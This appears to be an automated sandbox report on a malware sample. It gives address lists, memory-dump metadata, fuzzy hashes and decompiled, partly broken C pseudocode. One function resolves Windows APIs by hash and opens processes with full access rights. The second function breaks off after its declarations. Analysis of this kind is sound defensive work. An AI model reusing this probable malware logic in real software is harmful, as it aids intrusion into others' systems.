0x6fc5944d
0x6fc59450
0x6fc59453
0x6fc59453
0x6fc5945f
0x6fc5946a
0x6fc59470
0x6fc59474
0x6fc59461
0x6fc59461
0x6fc59461
0x6fc5947c
0x6fc594a6
0x6fc594ac
0x6fc594ac
0x6fc594b4
0x6fc5985d
0x6fc59863
0x6fc59869
0x6fc59869
0x00000000
0x6fc594ba
0x6fc594ba
0x6fc594be
0x6fc594c1
0x6fc594c4
0x6fc594c7
0x6fc594cb
0x6fc594cd
0x6fc594d0
0x6fc594d3
0x6fc594d7
0x6fc594dc
0x6fc594df
0x6fc594e3
0x6fc594e8
0x6fc594eb
0x6fc594ed
0x6fc594f0
0x6fc594f4
0x6fc594f9
0x6fc59509
0x6fc5950f
0x6fc5950f
0x6fc59517
0x6fc59519
0x6fc59522
0x6fc59524
0x6fc59527
0x6fc59532
0x6fc5955f
0x6fc59534
0x6fc5954b
0x6fc5954b
0x6fc59567
0x6fc5956d
0x6fc59573
0x6fc59573
0x6fc59567
0x6fc59522
0x6fc5957a
0x6fc595eb
0x6fc595f0
0x6fc59649
0x6fc5970b
0x6fc59710
0x6fc5971f
0x6fc59725
0x6fc59729
0x6fc59732
0x6fc59739
0x6fc59742
0x6fc59750
0x6fc59753
0x6fc5973b
0x6fc5973b
0x6fc5973b
0x6fc59739
0x6fc5975c
0x6fc59789
0x6fc5979c
0x6fc597a4
0x6fc5978b
0x6fc5978d
0x6fc59795
0x6fc59795
0x6fc5975e
0x6fc59763
0x6fc59782
0x6fc59765
0x6fc5976a
0x6fc5977b
0x6fc5976c
0x6fc5976c
0x6fc5976c
0x6fc5976a
0x6fc59763
0x6fc597ac
0x6fc597bb
0x6fc597c8
0x6fc597d1
0x6fc597d5
0x6fc597d9
0x6fc597dc
0x6fc597df
0x6fc597e2
0x6fc597e5
0x6fc597e8
0x6fc597ee
0x6fc597f2
0x6fc597f8
0x6fc597f8
0x6fc597ee
0x6fc597fe
0x6fc5983b
0x6fc5983f
0x6fc59846
0x6fc5984c
0x6fc59800
0x6fc59803
0x6fc59823
0x6fc59827
0x6fc5982e
0x6fc59835
0x6fc59805
0x6fc59808
0x6fc5980a
0x6fc5980e
0x6fc59818
0x6fc5981e
0x6fc5981e
0x6fc59808
0x6fc59803
0x6fc59853
0x6fc59853
0x6fc5986c
0x6fc5986c
0x6fc59872
0x6fc59877
0x6fc598d1
0x6fc598d6
0x6fc59915
0x6fc5991a
0x6fc5991c
0x6fc59920
0x6fc59923
0x6fc59926
0x6fc59928
0x6fc59929
0x6fc59929
0x6fc5992e
0x6fc5994c
0x6fc5994e
0x6fc59952
0x6fc59958
0x6fc5995b
0x6fc5995d
0x6fc5995e
0x6fc5995e
0x00000000
0x6fc59930
0x6fc59930
0x6fc59930
0x6fc59934
0x6fc5993a
0x6fc5993d
0x6fc5993f
0x6fc59942
0x6fc59961
0x6fc59961
0x6fc59968
0x6fc59982
0x6fc5996a
0x6fc5996a
0x6fc59976
0x6fc59977
0x6fc5997a
0x6fc5997a
0x6fc59990
0x6fc59990
0x6fc5992e
0x6fc598db
0x6fc598e9
0x6fc59901
0x6fc59905
0x6fc59908
0x6fc5990e
0x6fc59912
0x6fc59912
0x00000000
0x6fc59912
0x6fc598eb
0x6fc598ef
0x6fc598f5
0x6fc598f5
0x6fc598fb
0x00000000
0x6fc598fb
0x6fc598dd
0x6fc598e1
0x00000000
0x6fc598e1
0x6fc5987b
0x6fc598a7
0x6fc598bf
0x6fc598c3
0x6fc598c6
0x6fc598c9
0x6fc598cb
0x6fc598ce
0x6fc598a9
0x6fc598a9
0x6fc598ad
0x6fc598b0
0x6fc598b3
0x6fc598b6
0x6fc598b9
0x6fc598b9
0x00000000
0x6fc598a7
0x6fc59881
0x00000000
0x00000000
0x6fc59887
0x6fc5988b
0x6fc59891
0x6fc59894
0x6fc59897
0x6fc5989a
0x00000000
0x6fc5989a
0x6fc59712
0x6fc59716
0x6fc5971c
0x00000000
0x6fc5971c
0x6fc59654
0x6fc59666
0x6fc5966b
0x6fc596d6
0x00000000
0x00000000
0x6fc596dd
0x6fc59703
0x6fc59707
0x00000000
0x00000000
0x6fc596e6
0x6fc596eb
0x6fc596ff
0x00000000
0x00000000
0x00000000
0x6fc59701
0x6fc596f2
0x00000000
0x00000000
0x6fc596f7
0x00000000
0x00000000
0x6fc596f9
0x00000000
0x6fc596dd
0x6fc5966d
0x6fc59677
0x6fc59688
0x6fc5968b
0x6fc5968e
0x6fc59694
0x00000000
0x00000000
0x00000000
0x00000000
0x6fc5969a
0x6fc5969a
0x6fc5969a
0x6fc596a1
0x00000000
0x00000000
0x6fc596a3
0x6fc596a6
0x6fc596ac
0x00000000
0x00000000
0x00000000
0x6fc596ae
0x6fc596b0
0x6fc596b9
0x00000000
0x00000000
0x6fc596cd
0x00000000
0x00000000
0x00000000
0x6fc596cf
0x6fc5965b
0x00000000
0x00000000
0x00000000
0x6fc59661
0x6fc595f5
0x6fc59624
0x6fc59625
0x6fc5962e
0x00000000
0x6fc5963f
0x00000000
0x6fc5963f
0x6fc595fc
0x6fc595ff
0x6fc59612
0x6fc59613
0x6fc59617
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6fc595ff
0x6fc595f5
0x6fc59581
0x6fc595de
0x6fc595e2
0x6fc595e8
0x00000000
0x6fc595e8
0x6fc59583
0x6fc59587
0x6fc59594
0x6fc59598
0x6fc595ae
0x6fc595b6
0x6fc5959a
0x6fc5959c
0x6fc595a6
0x6fc595a6
0x6fc595bc
0x6fc595c5
0x6fc595dc
0x00000000
0x00000000
0x00000000
0x6fc595dc
0x6fc595c7
0x6fc595c7
0x00000000
0x6fc595bc

Strings

, xrefs: 6FC59947

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction ID: f79351e2c8f0945d2f239fb1f0e337e13234eb04223f2903c011b40166ecc4fa
Opcode Fuzzy Hash: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction Fuzzy Hash: 8822E4B040C385CBD714CF15C49136ABBE1FF86340F0089AEE8E54B699E335A979DB96

Uniqueness

Uniqueness Score: -1.00%

Function 6FC484E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6FC484E4(signed int __ecx, intOrPtr __edx) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t316;
				intOrPtr _t318;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				void* _t345;
				void* _t416;
				signed int _t417;
				signed int _t424;
				signed int _t432;
				intOrPtr* _t433;
				intOrPtr* _t434;
				signed int _t437;
				signed int _t441;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				void* _t451;
				signed int _t452;
				void* _t453;
				signed int _t454;
				void* _t457;
				intOrPtr* _t458;

				_push(_t435);
				_t458 = _t457 - 0xa4;
				 *_t458 = __ecx + 0x1c;
				 *((intOrPtr*)(_t458 + 0x68)) = __edx;
				 *(_t458 + 4) = __ecx;
				 *(_t458 + 0x84) = 0;
				 *((intOrPtr*)(_t458 + 0x78)) = __ecx + 4;
				while(1) {
					_t415 =  *(_t458 + 0x6c);
					E6FC4B714(_t458 + 0x24,  *(_t458 + 0x6c), 0x7fffffff);
					if(E6FC4F56C(_t458 + 0x24) == 0) {
						goto L3;
					} else {
						 *( *(_t458 + 4) + 0x2c) = 0;
						E6FC4F6F0(_t458 + 0x24);
					}
					L60:
					_t318 = 0xffffffffffffffff;
					L62:
					if(_t318 != 0) {
						L65:
						return _t318;
					} else {
						if( *(_t458 + 0x84) != 0x20) {
							E6FC5218C(0x5dc, _t415, _t435);
							 *(_t458 + 0x84) =  *(_t458 + 0x84) + 1;
							continue;
						} else {
							_t318 = 0xffffffffffffffff;
							goto L65;
						}
					}
					L71:
					L3:
					__eflags =  *( *(_t458 + 4));
					if( *( *(_t458 + 4)) > 0) {
						_t326 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x64) = _t326 * 4;
							_t434 = E6FC4F558( *(_t458 + 0x7c), _t326 * 4);
							_t435 =  *(_t458 + 0x20);
							__eflags = _t435;
							if(_t435 <= 0) {
								L11:
								_t435 =  *(_t458 + 4) + 4;
								_t283 = E6FC4F568( *(_t458 + 4) + 4);
								__eflags = _t283 -  *(_t458 + 0x64);
								if(_t283 >  *(_t458 + 0x64)) {
									_t451 = 4 + _t326 * 4;
									_t299 = E6FC4F568(_t435);
									__eflags = _t299 - _t451;
									if(_t299 > _t451) {
										 *((intOrPtr*)(_t458 + 0x9c)) = E6FC4F558(_t435,  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0x98)) = E6FC4F558(_t435, _t451);
										E6FC5382C( *((intOrPtr*)(_t458 + 0xa4)),  *((intOrPtr*)(_t458 + 0x9c)), E6FC4F568(_t435) - _t451);
										_t458 = _t458 + 0xc;
									}
									E6FC4F8C4(_t435, E6FC4F568(_t435) + 0xfffffffc);
									_t308 =  *(_t458 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t450 = E6FC52F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t450;
								if(_t450 != 0) {
									 *_t450( *(E6FC4F558( *(_t458 + 4),  *(_t458 + 0x64))));
								}
								_t285 = E6FC4F568( *_t458);
								__eflags = _t285 -  *(_t458 + 0x64);
								if(_t285 >  *(_t458 + 0x64)) {
									_t453 = 4 + _t326 * 4;
									_t287 = E6FC4F568( *_t458);
									__eflags = _t287 - _t453;
									if(_t287 > _t453) {
										_t435 = E6FC4F558( *(_t458 + 4),  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0xa0)) = E6FC4F558( *(_t458 + 4), _t453);
										E6FC5382C(_t288,  *((intOrPtr*)(_t458 + 0xa4)), E6FC4F568( *_t458) - _t453);
										_t458 = _t458 + 0xc;
									}
									E6FC4F8C4( *(_t458 + 4), E6FC4F568( *_t458) + 0xfffffffc);
									_t296 =  *(_t458 + 4);
									_t33 = _t296 + 0x18;
									 *_t33 =  *(_t296 + 0x18) - 1;
									__eflags =  *_t33;
								}
								_t326 = _t326 - 1;
								__eflags = _t326;
							} else {
								_t452 = 0;
								__eflags = 0;
								while(1) {
									_t310 = E6FC4F558(_t458 + 0x28, _t452 * 4);
									__eflags =  *_t310 -  *_t434;
									if( *_t310 ==  *_t434) {
										break;
									}
									_t452 = _t452 + 1;
									__eflags = _t452 - _t435;
									if(_t452 < _t435) {
										continue;
									} else {
										goto L11;
									}
									goto L20;
								}
								__eflags = _t452 - 0xffffffff;
								if(_t452 == 0xffffffff) {
									goto L11;
								} else {
								}
							}
							L20:
							_t326 = _t326 + 1;
							__eflags = _t326 -  *( *(_t458 + 4));
						} while (_t326 <  *( *(_t458 + 4)));
					}
					__eflags =  *(_t458 + 0x20);
					if( *(_t458 + 0x20) > 0) {
						_t325 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x7c) = _t325 * 4;
							_t433 = E6FC4F558(_t458 + 0x28, _t325 * 4);
							_t258 =  *(_t458 + 4);
							_t435 =  *_t258;
							__eflags = _t435;
							if(_t435 <= 0) {
								L29:
								_t445 = E6FC52F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t445;
								if(_t445 != 0) {
									_t447 =  *_t445(0x1fffff, 0,  *((intOrPtr*)(E6FC4F558(_t458 + 0x28,  *(_t458 + 0x7c)))));
									__eflags = _t447;
									if(_t447 != 0) {
										E6FC4F8C4( *(_t458 + 4), E6FC4F568( *_t458) + 4);
										 *(E6FC4F558( *(_t458 + 4), E6FC4F568( *_t458) + 0xfffffffc)) = _t447;
										 *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6FC4F558(_t458 + 0x28,  *(_t458 + 0x7c));
										 *((intOrPtr*)(_t458 + 0x70)) =  *(_t458 + 4) + 4;
										E6FC4F8C4( *((intOrPtr*)(_t458 + 0x74)), E6FC4F568( *(_t458 + 4) + 4) + 4);
										 *((intOrPtr*)(E6FC4F558( *((intOrPtr*)(_t458 + 0x74)), E6FC4F568( *((intOrPtr*)(_t458 + 0x70))) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t458 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
							} else {
								_t446 = 0;
								__eflags = 0;
								 *(_t458 + 0x88) =  &(_t258[1]);
								while(1) {
									_t279 = E6FC4F558( *((intOrPtr*)(_t458 + 0x8c)), _t446 * 4);
									__eflags =  *_t279 -  *_t433;
									if( *_t279 ==  *_t433) {
										break;
									}
									_t446 = _t446 + 1;
									__eflags = _t446 - _t435;
									if(_t446 < _t435) {
										continue;
									} else {
										goto L29;
									}
									goto L32;
								}
								__eflags = _t446 - 0xffffffff;
								if(_t446 == 0xffffffff) {
									goto L29;
								} else {
								}
							}
							L32:
							_t325 = _t325 + 1;
							__eflags = _t325 -  *(_t458 + 0x20);
						} while (_t325 <  *(_t458 + 0x20));
					}
					E6FC4F6F0(_t458 + 0x24);
					_t173 =  *(_t458 + 4);
					__eflags = _t173[0xb];
					if(_t173[0xb] != 0) {
						_t432 =  *_t173;
						__eflags = _t432;
						if(_t432 > 0) {
							_t435 = 0;
							__eflags = 0;
							_t324 =  &(_t173[1]);
							while(1) {
								_t441 = _t435 * 4;
								_t217 = E6FC4F558(_t324, _t441);
								_t218 =  *(_t458 + 4);
								__eflags =  *_t217 -  *((intOrPtr*)(_t218 + 0x30));
								if( *_t217 ==  *((intOrPtr*)(_t218 + 0x30))) {
									break;
								}
								_t435 = _t435 + 1;
								__eflags = _t435 - _t432;
								if(_t435 < _t432) {
									continue;
								}
								goto L46;
							}
							__eflags = _t435 - 0xffffffff;
							if(_t435 != 0xffffffff) {
								_t219 = E6FC4F568( *_t458);
								__eflags = _t219 - _t441;
								if(_t219 > _t441) {
									 *((intOrPtr*)(_t458 + 0x74)) = 4 + _t435 * 4;
									_t247 = E6FC4F568( *_t458);
									__eflags = _t247 -  *((intOrPtr*)(_t458 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t458 + 0x74))) {
										 *((intOrPtr*)(_t458 + 0x90)) = E6FC4F558( *(_t458 + 4), _t441);
										 *((intOrPtr*)(_t458 + 0x8c)) = E6FC4F558( *(_t458 + 4),  *((intOrPtr*)(_t458 + 0x74)));
										E6FC5382C( *((intOrPtr*)(_t458 + 0x98)),  *((intOrPtr*)(_t458 + 0x90)), E6FC4F568( *_t458) -  *((intOrPtr*)(_t458 + 0x74)));
										_t458 = _t458 + 0xc;
									}
									E6FC4F8C4( *(_t458 + 4), E6FC4F568( *_t458) + 0xfffffffc);
									_t424 =  *(_t458 + 4);
									_t75 = _t424 + 0x18;
									 *_t75 =  *(_t424 + 0x18) - 1;
									__eflags =  *_t75;
								}
								_t220 = E6FC4F568(_t324);
								__eflags = _t220 - _t441;
								if(_t220 > _t441) {
									_t435 = 4 + _t435 * 4;
									_t237 = E6FC4F568(_t324);
									__eflags = _t237 - _t435;
									if(_t237 > _t435) {
										_t238 = E6FC4F558(_t324, _t441);
										 *((intOrPtr*)(_t458 + 0x94)) = E6FC4F558(_t324, _t435);
										E6FC5382C(_t238,  *((intOrPtr*)(_t458 + 0x98)), E6FC4F568(_t324) - _t435);
										_t458 = _t458 + 0xc;
									}
									E6FC4F8C4(_t324, E6FC4F568(_t324) + 0xfffffffc);
									_t246 =  *(_t458 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6FC4F8C4( *(_t458 + 4), E6FC4F568( *_t458) + 4);
								 *(E6FC4F558( *(_t458 + 4), E6FC4F568( *_t458) + 0xfffffffc)) =  *( *(_t458 + 4) + 0x2c);
								 *((intOrPtr*)( *(_t458 + 4) + 0x18)) =  *((intOrPtr*)( *(_t458 + 4) + 0x18)) + 1;
								E6FC4F8C4(_t324, E6FC4F568(_t324) + 4);
								 *((intOrPtr*)(E6FC4F558(_t324, E6FC4F568(_t324) + 0xfffffffc))) =  *((intOrPtr*)( *(_t458 + 4) + 0x30));
								 *( *(_t458 + 4)) =  *( *(_t458 + 4)) + 1;
							}
						}
					}
					L46:
					 *((intOrPtr*)(_t458 + 8)) = 0;
					 *((intOrPtr*)(_t458 + 0xc)) = 0;
					E6FC4F620(_t458 + 0x14, 0);
					 *((intOrPtr*)(_t458 + 0x34)) =  *((intOrPtr*)(_t458 + 0x68));
					 *((intOrPtr*)(_t458 + 0x38)) = 0;
					E6FC4F620(_t458 + 0x40, 0);
					_t178 =  *(_t458 + 4);
					_t416 = 0x40;
					__eflags =  *((intOrPtr*)(_t178 + 0x18)) - 0x40;
					_t417 =  <  ?  *((void*)(_t178 + 0x18)) : _t416;
					 *(_t458 + 0x80) = _t417;
					__eflags = _t417;
					if(_t417 <= 0) {
						L57:
						_t415 = E6FC4F558(_t458 + 0x14, 0);
						_t180 = E6FC52878( *((intOrPtr*)(_t458 + 0xc)), _t179, 0x3e8);
						_t132 = _t180 - 0x80; // -128
						_t181 = _t132;
						__eflags = _t181 - 0x3f;
						_t316 =  <=  ? _t181 : _t180;
						__eflags = _t316 - 0x102;
						if(_t316 == 0x102) {
							goto L59;
						} else {
							__eflags = _t316 - 0x3f;
							if(_t316 <= 0x3f) {
								__eflags = _t316 << 2;
								 *((intOrPtr*)( *((intOrPtr*)(_t458 + 8)) + 0x2c)) =  *((intOrPtr*)(E6FC4F558( *(_t458 + 4), _t316 << 2)));
								_t188 = E6FC4F558( *(_t458 + 0x7c), _t316 << 2);
								_t415 =  *(_t458 + 4);
								 *((intOrPtr*)(_t415 + 0x30)) =  *_t188;
								_t318 =  *((intOrPtr*)(_t415 + 0x2c));
								E6FC4B680(_t458 + 0x34);
								E6FC4B680(_t458 + 8);
							} else {
								goto L59;
							}
						}
						goto L62;
					} else {
						_t454 = 0;
						__eflags = 0;
						while(1) {
							E6FC4CB48(_t458 + 0x4c);
							_t415 = 0;
							_t345 = _t458 + 0x4c;
							 *((char*)(_t345 + 4)) = 0;
							 *((intOrPtr*)(_t345 + 0x20)) = 0;
							__eflags = E6FC4C33C(_t345);
							if(__eflags != 0) {
								break;
							}
							E6FC4F8C4(_t458 + 0x14, E6FC4F568(_t458 + 0x10) + 4);
							 *((intOrPtr*)(E6FC4F558(_t458 + 0x14, E6FC4F568(_t458 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t458 + 0x4c));
							 *((intOrPtr*)(_t458 + 0xc)) =  *((intOrPtr*)(_t458 + 0xc)) + 1;
							_t202 = E6FC52F8C(0xa5eabdf8, 0xf3119fba);
							__eflags = _t202;
							if(_t202 == 0) {
								_t415 =  *(_t458 + 0x6c);
								__eflags = _t415;
								if(__eflags == 0) {
									break;
								} else {
									__eflags = _t415 - 0xffffffff;
									if(__eflags != 0) {
										E6FC4F8C4(_t458 + 0x40, E6FC4F568(_t458 + 0x3c) + 4);
										 *(E6FC4F558(_t458 + 0x40, E6FC4F568(_t458 + 0x3c) + 0xfffffffc)) =  *(_t458 + 0x6c);
										 *((intOrPtr*)(_t458 + 0x4c - 0x14)) =  *((intOrPtr*)(_t458 + 0x4c - 0x14)) + 1;
										E6FC4CDE0(_t458 + 0x4c, __eflags);
										_t454 = _t454 + 1;
										__eflags = _t454 -  *(_t458 + 0x80);
										if(_t454 <  *(_t458 + 0x80)) {
											continue;
										} else {
											_t437 = 0;
											__eflags = 0;
											do {
												_t211 = E6FC4F558( *(_t458 + 4), _t437 * 4);
												_t212 = E6FC4F558(_t458 + 0x40, _t437 * 4);
												E6FC48C14( *_t211, E6FC5034C(0xa5eabdf8, 0x4145240a),  *_t212, 0, 0);
												_t437 = _t437 + 1;
												__eflags = _t437 -  *(_t458 + 0x80);
											} while (_t437 <  *(_t458 + 0x80));
											goto L57;
										}
									} else {
										break;
									}
								}
							} else {
								__eflags = 0;
								_push(2);
								_push(0);
								_push(0);
								_push(_t458 + 0x6c);
								_push( *((intOrPtr*)(_t458 + 0x78)));
								_push( *((intOrPtr*)(_t458 + 0x60)));
								_push(0xffffffff);
								asm("int3");
								return _t202;
							}
							goto L71;
						}
						E6FC4CDE0(_t458 + 0x4c, __eflags);
						L59:
						E6FC4B680(_t458 + 0x34);
						E6FC4B680(_t458 + 8);
						goto L60;
					}
					goto L71;
				}
			}

0x6fc484e4
0x6fc484e8
0x6fc484f1
0x6fc484f7
0x6fc484fb
0x6fc484ff
0x6fc4850a
0x6fc4850e
0x6fc48513
0x6fc4851b
0x6fc4852b
0x00000000
0x6fc4852d
0x6fc48535
0x6fc4853c
0x6fc4853c
0x6fc48a8f
0x6fc48a91
0x6fc48ad2
0x6fc48ad4
0x6fc48ae3
0x6fc48aef
0x6fc48ad6
0x6fc48ade
0x6fc48af5
0x6fc48afa
0x00000000
0x6fc48ae0
0x6fc48ae2
0x00000000
0x6fc48ae2
0x6fc48ade
0x00000000
0x6fc48546
0x6fc4854a
0x6fc4854d
0x6fc48553
0x6fc48553
0x6fc48555
0x6fc4855c
0x6fc4856a
0x6fc4856c
0x6fc48570
0x6fc48572
0x6fc4859e
0x6fc485a2
0x6fc485a7
0x6fc485ac
0x6fc485b0
0x6fc485b4
0x6fc485bb
0x6fc485c0
0x6fc485c2
0x6fc48b51
0x6fc48b60
0x6fc48b7f
0x6fc48b84
0x6fc48b84
0x6fc485d5
0x6fc485da
0x6fc485de
0x6fc485de
0x6fc485de
0x6fc485ef
0x6fc485f1
0x6fc485f3
0x6fc48604
0x6fc48604
0x6fc48609
0x6fc4860e
0x6fc48612
0x6fc48617
0x6fc4861e
0x6fc48623
0x6fc48625
0x6fc48b13
0x6fc48b1f
0x6fc48b39
0x6fc48b3e
0x6fc48b3e
0x6fc4863b
0x6fc48640
0x6fc48644
0x6fc48644
0x6fc48644
0x6fc48644
0x6fc48647
0x6fc48647
0x6fc48574
0x6fc48576
0x6fc48576
0x6fc48578
0x6fc48584
0x6fc4858b
0x6fc4858d
0x00000000
0x00000000
0x6fc48599
0x6fc4859a
0x6fc4859c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6fc4859c
0x6fc4858f
0x6fc48592
0x00000000
0x00000000
0x6fc48594
0x6fc48592
0x6fc48648
0x6fc4864c
0x6fc4864d
0x6fc4864d
0x6fc48555
0x6fc48655
0x6fc4865a
0x6fc48660
0x6fc48660
0x6fc48662
0x6fc48669
0x6fc48677
0x6fc48679
0x6fc4867d
0x6fc4867f
0x6fc48681
0x6fc486bc
0x6fc486cb
0x6fc486cd
0x6fc486cf
0x6fc486ed
0x6fc486ef
0x6fc486f1
0x6fc48703
0x6fc48721
0x6fc4872a
0x6fc4872d
0x6fc4873b
0x6fc4874c
0x6fc4876a
0x6fc4876c
0x6fc48770
0x6fc48770
0x6fc48770
0x6fc486f1
0x6fc48683
0x6fc48687
0x6fc48687
0x6fc4868c
0x6fc48693
0x6fc486a2
0x6fc486a9
0x6fc486ab
0x00000000
0x00000000
0x6fc486b7
0x6fc486b8
0x6fc486ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6fc486ba
0x6fc486ad
0x6fc486b0
0x00000000
0x00000000
0x6fc486b2
0x6fc486b0
0x6fc48772
0x6fc48772
0x6fc48773
0x6fc48773
0x6fc48662
0x6fc48781
0x6fc48786
0x6fc4878a
0x6fc4878e
0x6fc48794
0x6fc48796
0x6fc48798
0x6fc487a2
0x6fc487a2
0x6fc487a4
0x6fc487a7
0x6fc487a9
0x6fc487b1
0x6fc487b8
0x6fc487bc
0x6fc487bf
0x00000000
0x00000000
0x6fc488bb
0x6fc488bc
0x6fc488be
0x00000000
0x00000000
0x00000000
0x6fc488be
0x6fc487c5
0x6fc487c8
0x6fc487d1
0x6fc487d6
0x6fc487d8
0x6fc487e4
0x6fc487e8
0x6fc487ed
0x6fc487f1
0x6fc48bce
0x6fc48be2
0x6fc48c04
0x6fc48c09
0x6fc48c09
0x6fc48807
0x6fc4880c
0x6fc48810
0x6fc48810
0x6fc48810
0x6fc48810
0x6fc48815
0x6fc4881a
0x6fc4881c
0x6fc48820
0x6fc48827
0x6fc4882c
0x6fc4882e
0x6fc48b8f
0x6fc48b9e
0x6fc48bb7
0x6fc48bbc
0x6fc48bbc
0x6fc48841
0x6fc48846
0x6fc4884a
0x6fc4884a
0x6fc4884a
0x6fc4885c
0x6fc4887d
0x6fc48885
0x6fc48893
0x6fc488b1
0x6fc488b7
0x6fc488b7
0x6fc487c8
0x6fc48798
0x6fc488c4
0x6fc488c6
0x6fc488ca
0x6fc488d3
0x6fc488de
0x6fc488e2
0x6fc488eb
0x6fc488f0
0x6fc488f6
0x6fc488f7
0x6fc488fb
0x6fc488ff
0x6fc48906
0x6fc48908
0x6fc48a48
0x6fc48a59
0x6fc48a60
0x6fc48a67
0x6fc48a67
0x6fc48a6a
0x6fc48a6d
0x6fc48a70
0x6fc48a76
0x00000000
0x6fc48a78
0x6fc48a78
0x6fc48a7b
0x6fc48a94
0x6fc48aac
0x6fc48aaf
0x6fc48ab4
0x6fc48abe
0x6fc48ac1
0x6fc48ac4
0x6fc48acd
0x00000000
0x00000000
0x00000000
0x6fc48a7b
0x00000000
0x6fc4890e
0x6fc48910
0x6fc48910
0x6fc48912
0x6fc48916
0x6fc4891b
0x6fc4891d
0x6fc48921
0x6fc48924
0x6fc4892c
0x6fc4892e
0x00000000
0x00000000
0x6fc48945
0x6fc48960
0x6fc48962
0x6fc48970
0x6fc48975
0x6fc48977
0x6fc48994
0x6fc48998
0x6fc4899a
0x00000000
0x6fc4899c
0x6fc4899c
0x6fc4899f
0x6fc489c0
0x6fc489df
0x6fc489e5
0x6fc489e8
0x6fc489ed
0x6fc489ee
0x6fc489f5
0x00000000
0x6fc489fb
0x6fc489fd
0x6fc489fd
0x6fc489ff
0x6fc48a0b
0x6fc48a17
0x6fc48a39
0x6fc48a3e
0x6fc48a3f
0x6fc48a3f
0x00000000
0x6fc489ff
0x00000000
0x00000000
0x00000000
0x6fc4899f
0x6fc48979
0x6fc48979
0x6fc4897f
0x6fc48981
0x6fc48982
0x6fc48983
0x6fc48984
0x6fc48988
0x6fc4898c
0x6fc4898e
0x6fc4898f
0x6fc4898f
0x00000000
0x6fc48977
0x6fc489a5
0x6fc48a7d
0x6fc48a81
0x6fc48a8a
0x00000000
0x6fc48a8a
0x00000000
0x6fc48908

Strings

, xrefs: 6FC48AD6

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction ID: ecb203ece057ec6356751f03014ac9adf44be889190a885c975c99ba7d3b2394
Opcode Fuzzy Hash: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction Fuzzy Hash: 33126B71A083449FD714DF64C990A6EB7F5AF95718F004A2DE5A9972E0FB30ED08CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6FC514D8, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6FC514D8(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
